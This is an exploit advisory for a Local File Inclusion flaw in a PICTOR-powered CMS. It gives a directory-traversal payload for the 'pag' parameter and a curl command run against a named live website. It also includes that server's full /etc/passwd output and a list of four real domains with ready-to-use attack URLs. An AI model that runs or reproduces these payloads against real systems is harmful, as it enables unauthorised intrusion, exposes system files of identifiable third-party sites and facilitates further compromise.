[+] Local File Inclusion on CMS NETGEAR powered by PICTOR
[+] Date: 14/12/2016
[+] Risk: Medium
[+] CWE number: CWE-98
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://www.pictor.com.br/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Gnu/Linux
[+] Vulnerable File: index.php
[+] Exploit :
http://host/index.php?pag= [ Local File Inclusion ]
[+] Payload :
"../../../../../../../../../../../../../etc/passwd"
[+] Example :
felipe@andrian # echo "Local File Inclusion:";curl -s "http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00" | grep :x
Local File Inclusion:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:497:RealtimeKit:/proc:/sbin/nologin
abrt:x:497:495::/etc/abrt:/sbin/nologin
nscd:x:28:494:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:496:491:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:490:HAL daemon:/:/sbin/nologin
openvpn:x:495:489:OpenVPN:/etc/openvpn:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
apache:x:48:488:Apache:/var/www:/sbin/nologin
saslauth:x:494:487:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:486::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:485::/var/spool/mqueue:/sbin/nologin
nm-openconnect:x:493:484:NetworkManager user for OpenConnect:/:/sbin/nologin
sshd:x:74:483:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
smolt:x:492:482:Smolt:/usr/share/smolt:/sbin/nologin
pulse:x:491:481:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:479::/var/lib/gdm:/sbin/nologin
pictor:x:500:500:Pictor Desenvolvimento:/home/pictor:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
webalizer:x:67:478:Webalizer:/var/www/usage:/sbin/nologin
[+] PoC :
http://acervocbncuritiba.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
http://tecnopisos.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
http://www.lucaldasbijoux.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00
http://qualysul.com.br/index.php?pag=../../../../../../../../../../../../../etc/passwd%00